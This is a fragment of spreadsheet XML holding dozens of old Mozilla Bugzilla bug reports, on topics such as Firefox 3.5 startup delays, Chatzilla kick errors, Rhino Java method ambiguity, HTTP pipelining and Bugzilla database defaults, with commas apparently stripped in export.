  <si>
    <t>very slow startup for Firefox 3.5 due to accessing IE Internet Temporary Files and Windows Temp folder</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9.1) Gecko/20090624 Firefox/3.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9.1) Gecko/20090624 Firefox/3.5
I have tried firefox 3.5 final version today. It starts up very very slow(almost morethen two minutes). I have a very powerfull machine at work (Q6600 with 4 GB Ram). HEre is what i have done to resolve the issues
- Cleared all the cache (also from ie just in case as i read somewhere that ie cache can also have an impact on startup)
- disable update check for all three things
- Tried to compact the data base by Vacuum command
and finally when things didnt go well I removed the profile fodler from Documents and settings (removed mozilla folder)
Even after doing all the things above i still have a very slow startup of firefox for the first time(after reboot) subsequent startups are fine (3-4)secs. I have also been experimenting with earlier releases beta 234 rc1 the problem started after beta 4 as far as i can remember.
Reproducible: Always
Steps to Reproduce:
1. Stat firefox after reboot
2.
3.
Actual Results:  
starts up in 2 mins
Expected Results:  
should start up in under 10 secs
I also tried clean install with no plugins/extensins that didnt help either.</t>
  </si>
  <si>
    <t>amir.spamable</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-255449</t>
  </si>
  <si>
    <t>Kick command returns username not found error</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win95 en-US rv:1.7.1) Gecko/20040707
Build Identifier: Mozilla/5.0 (Windows U Win95 en-US rv:1.7.1) Gecko/20040707
When attempting to use either the /kick command or the right-click enabled kick
command using the 0.9.64f build of Chatzilla no actual kick takes place and an
error message is given.
Reproducible: Always
Steps to Reproduce:
1.Start Chatzilla build 0.9.64f
2.Have operator status in a channel
3.Attempt to kick any user.
Actual Results:  
I don't remember the exact error message given but it's close to: User not found
on this channel.
No action is taken as observed by another client within the channel.
Expected Results:  
User should have been removed from the channel if the /kick command was used
the text following the username should have been given as the reason for the kick.
Reverted to 0.9.64e as a temporary solution.
Severity is minor for users major for operators.</t>
  </si>
  <si>
    <t>MozWanderbug</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-186705</t>
  </si>
  <si>
    <t>unicare.com - can't find an insurance agent</t>
  </si>
  <si>
    <t>load http://isg.unicare.com/maj_bus/individual/Illinois/index.htm
click agentfinder in the left frame
fill out form click search
submit doesn't happen</t>
  </si>
  <si>
    <t>TOOLKIT-403462</t>
  </si>
  <si>
    <t>clarify localization note in blockedSite.properties</t>
  </si>
  <si>
    <t>The localization note in blockedSite.properties for phishing.learnMoreLink seems to be a tad misleading see bug 403246.
It'd be nice if we could clarify that it's only affecting the markup of the link not the anchor text.
Maybe please leave the HTML markup for ... as is. instead of the ... text.
Abdulkadir would that have helped?</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-280246</t>
  </si>
  <si>
    <t>WINCE xpfe changes</t>
  </si>
  <si>
    <t>needed to make a changes to get xpfe to compile and work on wince</t>
  </si>
  <si>
    <t>CORE-13417</t>
  </si>
  <si>
    <t>Rhino: use of 'this' in methods called from JavaAdapter</t>
  </si>
  <si>
    <t>Subject:
        Rhino and overloaded drawImage
   Date:
        Wed 08 Sep 1999 15:06:31 -0400
   From:
        Andrew Wason 
     To:
        norris@netscape.com
    CC:
        Howard Lin 
I'm getting an EvaluatorException for this:
g.drawImage(bgImg00this)
The message is:
org.mozilla.javascript.EvaluatorException: The choice of Java method
sun.awt.windows.WGraphics.drawImage matching JavaScript argument types
(sun.awt.windows.WImagenumbernumberobject) is ambiguous candidate
methods are: void
drawImage(java.awt.image.BufferedImagejava.awt.image.BufferedImageOpintin
t) boolean drawImage(java.awt.Imageintintjava.awt.image.ImageObserver)
See the attached output and JS file.
Andrew
--
Andrew Wason
SoftCom Inc.
aw@softcom.com
   bug3.js
          Name:
                bug3.js
          Type:
                Plain Text (text/plain)
   bug3.txt
          Name:
                bug3.txt
           Type:
                Plain Text (text/plain)
bug3.js:
importPackage(Packages.javax.swing)
importPackage(java.awt)
importPackage(java.net)
importPackage(java.lang)
var bgImg = Toolkit.getDefaultToolkit().getImage(new
        URL(http://www.mozilla.org/rhino/rhino50.jpg))
var foo = new JComponent() {
        paint: function(g) {
                g.drawImage(bgImg00this)
                super.paint(g)
        }
}
var f = new Frame()
f.add(foo BorderLayout.CENTER)
f.setSize(300300)
f.setVisible(true)
bug3.txt:
org.mozilla.javascript.EvaluatorException: The choice of Java method sun.awt.win
        at org.mozilla.javascript.DefaultErrorReporter.runtimeError(DefaultError
        at org.mozilla.javascript.Context.reportRuntimeError(Context.java:484)
        at org.mozilla.javascript.Context.reportRuntimeError(Context.java:500)
        at org.mozilla.javascript.NativeJavaMethod.findFunction(NativeJavaMethod
        at org.mozilla.javascript.NativeJavaMethod.call(NativeJavaMethod.java C
        at org.mozilla.javascript.ScriptRuntime.call(ScriptRuntime.java:1256)
        at org.mozilla.javascript.Interpreter.interpret(Interpreter.java Compil
        at org.mozilla.javascript.InterpretedFunction.call(InterpretedFunction.j
        at org.mozilla.javascript.NativeClosure.call(NativeClosure.java:56)
        at org.mozilla.javascript.ScriptRuntime.call(ScriptRuntime.java:1256)
        at org.mozilla.javascript.FlattenedObject.call(FlattenedObject.java:234)
        at org.mozilla.javascript.FlattenedObject.callMethod(FlattenedObject.jav
        at org.mozilla.javascript.JavaAdapter.callMethod(JavaAdapter.java:156)
        at adapter0.paint()
        at java.awt.Container.paint(Container.java:773)
        at sun.awt.windows.WComponentPeer.handleEvent(WComponentPeer.java:117)
        at java.awt.Component.dispatchEventImpl(Component.java:2447)
        at java.awt.Container.dispatchEventImpl(Container.java:1035)
        at java.awt.Window.dispatchEventImpl(Window.java:749)
        at java.awt.Component.dispatchEvent(Component.java:2307)
        at java.awt.EventQueue.dispatchEvent(EventQueue.java:287)
        at java.awt.EventDispatchThread.pumpOneEvent(EventDispatchThread.java:10
        at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:92)
        at java.awt.EventDispatchThread.run(EventDispatchThread.java:83)
Exception occurred during event dispatching:
java.lang.Error: The choice of Java method sun.awt.windows.WGraphics.drawImage m
        at org.mozilla.javascript.JavaAdapter.callMethod(JavaAdapter.java:162)
        at adapter0.paint()
        at java.awt.Container.paint(Container.java:773)
        at sun.awt.windows.WComponentPeer.handleEvent(WComponentPeer.java:117)
        at java.awt.Component.dispatchEventImpl(Component.java:2447)
        at java.awt.Container.dispatchEventImpl(Container.java:1035)
        at java.awt.Window.dispatchEventImpl(Window.java:749)
        at java.awt.Component.dispatchEvent(Component.java:2307)
        at java.awt.EventQueue.dispatchEvent(EventQueue.java:287)
        at java.awt.EventDispatchThread.pumpOneEvent(EventDispatchThread.java:10
        at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:92)
        at java.awt.EventDispatchThread.run(EventDispatchThread.java:83)</t>
  </si>
  <si>
    <t>BUGZILLA-31117</t>
  </si>
  <si>
    <t>should have a submit only my comments option on midair collision</t>
  </si>
  <si>
    <t>Some suggestions for the midair collision warning:
Since it states right in the submit anyway text that added comments will not be 
overridden the midair collision warning should not happen if the other thing the 
previous person to edit the bug did was add a comment.  Since it displays the 
diff right on the page it's pretty obvious that was the only thing done and the 
collision detection should be smart enough to figure that out and not give the 
warning.
Conversly if the CURRENT edit is only adding a comment this should also 
automatically happen and not issue the warning.  (on the other hand it could be 
a duplicate post from the same browser which is probably also detectable and 
the warning should occur in this case).
Also instead of only Submit anyway and erase the other persons changes (except 
comments) and throw out my changes and revisit the bug it should also have a 
choice to add my comment anyway but ignore any other changes I made.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-439247</t>
  </si>
  <si>
    <t>si / Sinhala</t>
  </si>
  <si>
    <t>Thunderbird 3.0 in si - Sinhala</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Thunderbird 3.0
We are from Sri Lanka and we already done with Thunderbird 2.x for 'si' (bug id :294435) and now we would like to work on Thunderbird 3.0.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>iamsarves</t>
  </si>
  <si>
    <t>SEAMONKEY-342087</t>
  </si>
  <si>
    <t>extended toolkit  for SeaMonkey preferences</t>
  </si>
  <si>
    <t>My goal is to extend the toolkit prefwindow binding to appear just like the current SeaMonkey preferences display but use the    etc elements exactly like they are used in toolkit.
The way I implement for SeaMonkey should allow the use of [xpfe=false] to use the toolkit prefwindow should an extension author wish.
This work is not blocked by suiterunner but is targetted only at SeaMonkey 1.5 though work could be done to see if it is feasable in SeaMonkey 1.1</t>
  </si>
  <si>
    <t>bugspam.Callek</t>
  </si>
  <si>
    <t>CORE-471220</t>
  </si>
  <si>
    <t>VIDEO tag unable to play if we switch to a invalid file and then to a valid one</t>
  </si>
  <si>
    <t>VIDEO tag unable to play if we switch to a invalid file and then to a valid one
steps :-
1. go to attachment 346840 
2. click play button
3. let the movie play till you hear the sound
4. Change URL to http://www.double.co.nz/video_test/file_not_exist.xyz
5. Click URL Change to button
7. Wait for the URL to load
7. Change URL to http://www.double.co.nz/video_test/8aug2007.ogg
8. Click URL Change to button
9. Click Play button
Result:-
video dont play
Expected:-
video should play
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre)
Gecko/20081226 Minefield/3.2a1pre
WinXP/Ubuntu</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-70676</t>
  </si>
  <si>
    <t>Kerberos POP support</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-115757</t>
  </si>
  <si>
    <t>Skinability</t>
  </si>
  <si>
    <t>NS_THEME_SCROLLBAR* implementations (Windows)</t>
  </si>
  <si>
    <t>This covers the implementation of NS_THEME_SCROLLBAR 
NS_THEME_SCROLLBAR_BUTTON NS_THEME_SCROLLBAR_TRACK
NS_THEME_SCROLLBAR_TRACK_START NS_THEME_SCROLLBAR_TRACK_END
NS_THEME_SCROLLBAR_THUMB and NS_THEME_SCROLLBAR_GRIPPER for XUL scrollbars on
Windows.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-256427</t>
  </si>
  <si>
    <t>[german help] translate customize_help.xhtml</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a3) Gecko/20040817 Mnenhy/0.6.0.104
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a3) Gecko/20040817 Mnenhy/0.6.0.104
das ist irgendwie durchgerutscht.
Ich hab inzwischen angefangen das zu Ã¼bersetzen.
Wird vermutlich bis morgen fertig.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>opitz.michael</t>
  </si>
  <si>
    <t>TESTING-445596</t>
  </si>
  <si>
    <t>mochitest failures due to leaks should TinderboxPrint: something</t>
  </si>
  <si>
    <t>When mochitests fail due to leaks they should TinderboxPrint: something to indicate that they failed due to leaks.  This makes it clear that a reason for the orange is leaks without having to view the log.
This is particularly important when there are multiple failures happening at the same time (like right now) and nobody would notice that leaks have started until the test failure that's also causing orange is fixed.</t>
  </si>
  <si>
    <t>CORE-292914</t>
  </si>
  <si>
    <t>No repaint after scrolling 32768 pixels</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050504
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050504
Well I scroll to the bottom of the document using the  key I sometime see
other parts of the document. It is a repaint problem because the links are
still active and the mouse pointer change when I hover them (even if I can't
see them because they are not drawn)
Scrolling with page down or the scroll bar doesn't show the bug.
Reproducible: Sometimes
Steps to Reproduce:
1. Open a long page see URL for example
2. Scroll to bottom using the  key
3. If the bug doesn't show go to the top again and scroll with the 
key one time and repeat step 2
Actual Results:  
Parts of the top of the page is displayed instead of the bottom.
Expected Results:  
Display the good part of the page
Tested with Mozilla and Firefox</t>
  </si>
  <si>
    <t>SOCORRO-934960</t>
  </si>
  <si>
    <t>Error 404 When Loading Tiny Graphs on Topcrashers with FakeData</t>
  </si>
  <si>
    <t>I had an email discussion with rhelmer about this problem and he asked I opened a bug so here it is )
So when running a local instance of the Django app and connecting to FakeData I get the following 404 error when trying to load the tiny graphs (for lack of a better description|signature history service):
http://sneethling.pastebin.mozilla.org/3428946</t>
  </si>
  <si>
    <t>schalk.neethling.bugs</t>
  </si>
  <si>
    <t>TOOLKIT-443367</t>
  </si>
  <si>
    <t>test_bug394717 uses timeouts and the network which leads to intermittent failures</t>
  </si>
  <si>
    <t>Created attachment 327935
patch rev 1
test_bug394717 starts an update check for all installed add-ons and then delays to see if the check completed correctly. This is bogus the more add-ons that are present the longer this will take and additionally it is letting the update checks go out to the network which is not a good idea for a deterministic test.
Seamonkey is hitting intermittent failures on this due to the presence of some 6 default add-ons present some of which are checking for updates from AMO.
This simple patch removes the timeout and simply calls the final checks in the last callback from the update check. It also adds the test server ad makes default update pings go there to avoid touching the network.</t>
  </si>
  <si>
    <t>CORE-366519</t>
  </si>
  <si>
    <t>unnecessary assignments in cocoa nsLookAndFeel::NativeGetColor</t>
  </si>
  <si>
    <t>There are lots of unnecessary assignments in cocoa nsLookAndFeel::NativeGetColor</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-242789</t>
  </si>
  <si>
    <t>LDAP v3 - fallback to v2 if v3 connect doesn't work with &gt;=1.7</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040504
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040504
LDAP connection should autmatically fall back to version 2 if version 3 fails.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>mkralec</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-413547</t>
  </si>
  <si>
    <t>AMO pt - Extension Localization Effort / DownloadHelper</t>
  </si>
  <si>
    <t>Contacted author MIG</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-353472</t>
  </si>
  <si>
    <t>about getting a component for mn/Mongolian</t>
  </si>
  <si>
    <t>Hi
Is it possible to add mn-MN/Mongolian entry to the Component and Version field in the Mozilla Localizations product?
Default assignee and QA can be my address natsagdorj@t-online.de
thank you.</t>
  </si>
  <si>
    <t>natsag2000</t>
  </si>
  <si>
    <t>CORE-384151</t>
  </si>
  <si>
    <t>Consolidating primitive-to-object conversions</t>
  </si>
  <si>
    <t>[This is a spin-off of a patch from bug 382165 to detach the refactoring from GC-safety changes]
Currently in few places SM contains code like:
if (ISVAL_IS_STRING(v))
  obj = js_StringToObject(JSVAL_TO_STRING(v))
else if if (ISVAL_IS_BOOLEAN(v))
  obj = js_BooleanToObject(JSVAL_TO_BOOLEAN(v))
else if if (ISVAL_IS_INT(v))
  obj = js_NumberToObject(JSVAL_TO_INT(v))
else if if (ISVAL_IS_DOUBLE(v))
  obj = js_NumberToObject(*JSVAL_TO_DOUBLE(v))
It would be nice to consolidate all such fragments behind a single function which can also share the code between  js_SomethigToObject boxing function as all such functions are essentially the same.
The new function should also avoid allocation of new jsdouble GC thing which the current code does whenever it boxes non-int double.</t>
  </si>
  <si>
    <t>SEAMONKEY-124242</t>
  </si>
  <si>
    <t>about.html doesn't handle empty useragent</t>
  </si>
  <si>
    <t>I'm halfway through work to extract useragent from http in the interim i have none.  So i run into things like this.
JavaScript error:
jar:resource:///chrome/en-US.jar!/locale/en-US/global/about.html line 73: navigator.userAgent.match(/rv:([^)]+)/) has no properties</t>
  </si>
  <si>
    <t>THUNDERBIRD-225288</t>
  </si>
  <si>
    <t>thunderbird does not recognize mission control preferences</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20031007
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20031007
With Firebird or Mozilla it is possible to use 
pref(general.config.filename ect.cfg)
pref(general.config.vendor ect)
preferences in all.js and make the client query a web server to download
preferences. Support for this feature does not exist in Thunderbird.  I am sure
Reproducible: Always
Steps to Reproduce:
1. Read
http://www.int-evry.fr/mci/user/procacci/netscape/en/mozilla-autoconfig-en.html
and set up a mission control server as described in
http://bugzilla.mozilla.org/show_bug.cgi?id=206294
2. Launch thunderbird
3. Observe web server logs to see a hit
Actual Results:  
No hits to the mission control servers coming from thunderbird client
Expected Results:  
Thunderbird should contact the web server and download the configuration and
apply them (lock some settings etc.) like Mozilla or Firebird does. However it
looks like it doesn't do that.
When I compile thunderbird on Linux with just export MOZ_THUNDERBIRD=1
mk_add_options MOZ_THUNDERBIRD=1 set in the .mozconfig it actually works but of
course it's not thunderbird anymore.</t>
  </si>
  <si>
    <t>topalg</t>
  </si>
  <si>
    <t>BUGZILLA-286695</t>
  </si>
  <si>
    <t>bugs.resolution needs a default value</t>
  </si>
  <si>
    <t>There is still one problem left preventing entry of a new bug on Postgres: the
resolution column does not have any default value is declared as NOT NULL and
at bug creation time we are not passing any value.
I think that there is no need to specify the value at creation time (the bug
should never have any resolution when created) so default value '' (empty
string) in the DB is probably appropriate.</t>
  </si>
  <si>
    <t>CORE-204312</t>
  </si>
  <si>
    <t>Layout: Positioned</t>
  </si>
  <si>
    <t>Offsetwidth for tr element returns enormous value if its table is absolutely positioned and is within an absolutely positioned element.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030401
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030401
The test case page demonstrates the bug.  The first alert should not report the
width of the table row as 71 million the second alert is correct.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>zzhumphreyt</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-100811</t>
  </si>
  <si>
    <t>aol.com - Test for writing content to a pop-up 'on the fly' fails</t>
  </si>
  <si>
    <t>1. navigate to the url 
http://browsertest.web.aol.com/tests/javascript/javascpt/testpgs/window/onthefly
.htm
2.As instructions state fill in some text and hit open pop up 
3.Pop up appears with text 'undefined 
4.Expected result: Pop up should contain text that user typed
Tested in .0.9.4 build. Discovered while running smoketests for embedding at: 
http://www.mozilla.org/quality/smoketests/embed-basic-test.html EM18
This works as stated using IE.</t>
  </si>
  <si>
    <t>jmkobayashi</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-318281</t>
  </si>
  <si>
    <t>xezzex.homepage.dk - regfiles sent as audio/mpeg</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
When downloading a Windows .reg file the filename is appended with .mp3. So instead of having the name test.reg it is renamed test.reg.mp3!
Reproducible: Always
Steps to Reproduce:
1. visit xezzex.homepage.dk
2. click on Filer link to the right
3. click on the file Stop Windows standard shares and it is automatically downloaded
Actual Results:  
The file was downloaded and the name was appended with .mp3
Expected Results:  
NOT change the filename
Extensions: NoScript 1.1.3.4 Tabbrowser Preferences 1.2.8.7 Fasterfox 0.7.9 Download Statusbar 0.9.4</t>
  </si>
  <si>
    <t>danish</t>
  </si>
  <si>
    <t>xezzex</t>
  </si>
  <si>
    <t>CORE-474757</t>
  </si>
  <si>
    <t>Several build failures on Solaris build for js/src</t>
  </si>
  <si>
    <t>It was bug 470999.
The patch was not landed on mozilla-central.</t>
  </si>
  <si>
    <t>BUGZILLA-194917</t>
  </si>
  <si>
    <t>bug flags template includes javascript outside of comment block</t>
  </si>
  <si>
    <t>The following template fails to include HTML  comment blocks around 
the inside contents of the ... causing the bug edit page to 
fail to display on some browsers:  template/en/default/flag/list.html.tmpl
In particular the w3m text-based browser stops displaying the page when it 
encounters that script block.</t>
  </si>
  <si>
    <t>jlawson-mozbug</t>
  </si>
  <si>
    <t>BUGZILLA-149246</t>
  </si>
  <si>
    <t>need to be able to specify relative dates in days</t>
  </si>
  <si>
    <t>beeing able to specify relative dates allows savings of queries for the last
week or periods back.
syntax: -?\d+[dD]     (-20d means 20 days back 20D the same)</t>
  </si>
  <si>
    <t>BUGZILLA-450573</t>
  </si>
  <si>
    <t>checksetup gives install-module --all instructions in Windows</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322 .NET CLR 2.0.50727 .NET CLR 1.0.3705 InfoPath.1)
Build Identifier: bugzilla 3.2rc1
install-module.pl wants to build DBD::Pg and dumps while Postgress isn't used as database
install-module.pl wants to build DBD::Pg you get the question:
  CPAN.pm: Going to build T/TU/TURNSTEP/DBD-Pg-2.9.0.tar.gz
Configuring DBD::Pg 2.9.0
Path to pg_config?
Entering gives you:
Use of uninitialized value in -d at Makefile.PL line 80  line 1.
Use of uninitialized value in sprintf at Makefile.PL line 86  line 1.
Use of uninitialized value in sprintf at Makefile.PL line 86  line 1.
Use of uninitialized value in sprintf at Makefile.PL line 86  line 1.
Use of uninitialized value in pattern match (m//) at Makefile.PL line 87  line 1.
PostgreSQL version: 00000 (default port: 5432)
POSTGRES_HOME: (not set)
POSTGRES_INCLUDE: (not set)
POSTGRES_LIB: (not set)
OS: MSWin32
Could not determine the PostgreSQL library version.
Please ensure that a valid path is given to the 'pg_config' command
either manually or by setting the environment variables
POSTGRES_DATA POSTGRES_INCLUDE and POSTGRES_LIB
Could not read '\.cpan\build\DBD-Pg-2.9.0-URt6kW\META.yml'. Falling back to other methods to determi
ne prerequisites
Microsoft (R) Program Maintenance Utility   Version 1.50
Copyright (c) Microsoft Corp 1988-94. All rights reserved.
NMAKE : fatal error U1064: MAKEFILE not found and no target specified
Stop.
  TURNSTEP/DBD-Pg-2.9.0.tar.gz
  nmake -- NOT OK
Warning (usually harmless): 'YAML' not installed will not store persistent state
Skipping test because of notest pragma
Running make install
  Make had returned bad status install seems impossible
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>bigstijn</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-403968</t>
  </si>
  <si>
    <t>tag ES support pages for production</t>
  </si>
  <si>
    <t>Please tag the following commit for production:
http://viewvc.svn.mozilla.org/vc?view=rev&amp;revision=7992
We have added links to the new Spanish support site to the in-product pages.
Thanks</t>
  </si>
  <si>
    <t>TOOLKIT-380871</t>
  </si>
  <si>
    <t>Cannot find a way to centralize and secure Extension Manager managed addon installation</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 (R1 1.5) .NET CLR 1.1.4322 InfoPath.1 MEGAUPLOAD 1.0 .NET CLR 2.0.50727)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
We are at present investigating the possibility of deploying Firefox as Internet browser in our organisation.
For such a deployment to be successful we need to be able to control the software's behaviour in a number of aspects. More precisely as for both practical and security reasons we have to be able to control the installed version of the software and its plugins and addons any software update and / or installation has to managed internally and distributed centrally. It should not be possible for a user to bypass this process.
The best solution we could find to block a user from installing unauthorized addons is to modify the fileIsItemPackage(file) function in the nsExtensionManager.js script by removing the xpi and jar extensions. This has the desired result as the addon installation is not proposed even if a xpi file exists in the extensions folder.
However we have noticed that simply copying the directory containing an already installed addon from another computer into the extensions folder results in the addon being available in Firefox without any further action. Normally a standard user will not be able to copy to C:\Program Files\Mozilla Firefox\extensions but he does have access to %appdata%\Mozilla\Firefox\Profiles\d8mn5o2t.default\extensions which has the same effect: 
What measures can you propose to block this taking into account that Firefox's profile manager allows a user to create a new profile and thereby bypass any change in permissions that we could apply to the %appdata%\Mozilla\Firefox\Profiles\d8mn5o2t.default\extensions  folder?
I look forward to your reply and thank you in advance for your kind cooperation.
Yours sincerely
SÃ©bastien Dehennault
European Parliament
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>sebastien.dehennault</t>
  </si>
  <si>
    <t>CORE-445516</t>
  </si>
  <si>
    <t>Support auto-generated=true text attribute on list bullets</t>
  </si>
  <si>
    <t>There's only one place to support static: true -- for list bullets.
We actually try to expose static now. For list bullet text leaves we use
ROLE_STATICTEXT -- see nsHTMLListBulletAccessible::GetRole(). Then in
http://mxr.mozilla.org/seamonkey/source/accessible/src/html/nsHTMLTextAccessible.cpp#105
We currently map that to the object attribute static=true which is wrong. The only reason we did that is that at the time I thought object attributes on text leaves would get mapped to text attributes. We need to remove that but have look for ROLE_STATICTEXT and map that into a text attribute static=true directly.
When we fix bug 346833 we should do this for :before and :after as well.
Note: we need to talk to Pete Brunet because the IA2 spec uses object attributes and sub attributes to do this. See http://www.linuxfoundation.org/en/Accessibility/IAccessible2/ObjectAttributes#List</t>
  </si>
  <si>
    <t>andrew.quartey</t>
  </si>
  <si>
    <t>CORE-447866</t>
  </si>
  <si>
    <t>http pipelining is bursty</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1
Build Identifier: fennec m5
I have observed that when fetching a page with max connection
of 1 I would never see pipelining while the base HTML document was
being transferred. 
I thought for a bit this was 364315 (speculative loader) but it applies
in the case of javascript as well as images et al.. and that bug does
not apply to fetching js. Furthermore if I have 2 connections the
javascript is indeed fetched in parallel with the html page - so it is
not a case of not scheduling the transaction it just won't pipeline it
if a free connection is unavailable.
This generalizes to any case needing &gt; N objects over N connections. The
first N go in parallel but no pipelining occurs until one of those
first connections frees up.
But I do see pipelining just never against the first transaction on a
connection.
Which brings me to the meat of this issue. I've dug around and I'm
looking for clarifications on what I think is going on roughly
speaking:
..
New transactions come into nsHttpConnectionMgr::ProcessNewTransaction()
and the manager tries to find a connection for them to use.. this might
be an idle persistent connection or it might be a new tcp session. this
allocation is subject to per-server and UA-wide limits. If it finds a
connection the http request is dispatched to that connection and sent
right out.. if it can't find one (probably due to those limits) the
transaction is put on the pending queue in memory.
when a connection finishes its scheduled work it goes through the
reclaim logic and then a new transaction is plucked from the pending
queue (if any) and dispatched again (either reusing that connection in
the case of persistent conns or using a new connection).
Pipelining is cleverly wedged in here through the dispatch logic -
which basically says when sending its request if there are more
transactions queued up (subject to pipelining suitability of course)
then add some of those transactions (up to the number allowed by the
maxpipelinedrequests preference) to this connection too. When the
connection is activated there may be multiple requests written out all
at the same time in a pipelined burst.
...
this means that requests are never pipelined at the rate they are
identifed to ::ProcessNewTransaction(). PNT always sends them out right
way or adds latency by placing the in pending queue. The reclaim logic
then grabs as many as it is allowed from the queue the next time around
and sends them out in a burst.
This creates a couple problems
 * the aforementioned problem where the first transaction on an idle
connection (dispatched directly from PNT()) never has anything pipelined
against it - and this likely includes key components such as js and css
against base HTML.
 * The burstiness of the request bundling leads to additional transfer
latency as upstream bandwidth could be exhausted and network queuing
delays kick in - especially true on mobile where upstream bandwidths can
be stingy at best. Burstiness will also interfere with any strategies we
may want to implement to manage the windows on different connections to
dynamically balance their priorities.
ï»¿
Right now the flow looks like
 OUT: &gt;       &gt;&gt;            &gt;&gt;&gt;&gt;
  IN:     &lt;&lt;&lt;&lt;    &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;    &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
Where it could look like
 OUT: &gt;    &gt; &gt;     &gt; &gt; &gt; &gt;
   IN:    &lt;&lt;&lt;&lt; &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
The latter finishes quicker and is smoother - both desirable properties.
I don't have enough of a handle on the code yet to even suggest how to
fix it - it certainly looks like connection::Activate() wants to have
everything queued on it and then run to completion before having new
transactions enqueued.. but I'm sure its not a huge deal.
Reproducible: Always</t>
  </si>
  <si>
    <t>mcmanus</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-363679</t>
  </si>
  <si>
    <t>R_X86_64_PC32 relocations in nsLDAPBERElement.cpp building trunk thunderbird</t>
  </si>
  <si>
    <t>lber.h needs to be in config/system/headers.  Otherwise building trunk thunderbird fails with the error message below.  See bug 359275 for details.
/usr/bin/ld: nsLDAPBERElement.o: relocation R_X86_64_PC32 against `ber_flatten' 
can not be used when making a shared object recompile with -fPIC
/usr/bin/ld: final link failed: Bad value
collect2: ld returned 1 exit status
gmake[6]: *** [libmozldap.so] Error 1</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-336320</t>
  </si>
  <si>
    <t>Doctor incorrectly uses CRLF (\r\n) instead of LF (\n) line terminator</t>
  </si>
  <si>
    <t>When playing around with Doctor it was noticed that Doctor changes a unix file (LF) into CRLF. Doctor should never modify the original line endings of a file. It should use what format the file already was.
Way to test from Beuc:
 Here's our test:
 - reed create index.html using cvs
 - I update index.html using Doctor
 - index.html had \n now has \r\n
 http://cvs.savannah.gnu.org/viewcvs/doctor-test/doctor-test/index.html?rev=1.2&amp;root=Web&amp;view=log
 and: rsync -av cvs.sv.gnu.org::web/doctor-test/doctor-test/index.html .
We (GNU) cannot use Doctor to its fullest abilities until this bug is fixed.</t>
  </si>
  <si>
    <t>CALENDAR-251771</t>
  </si>
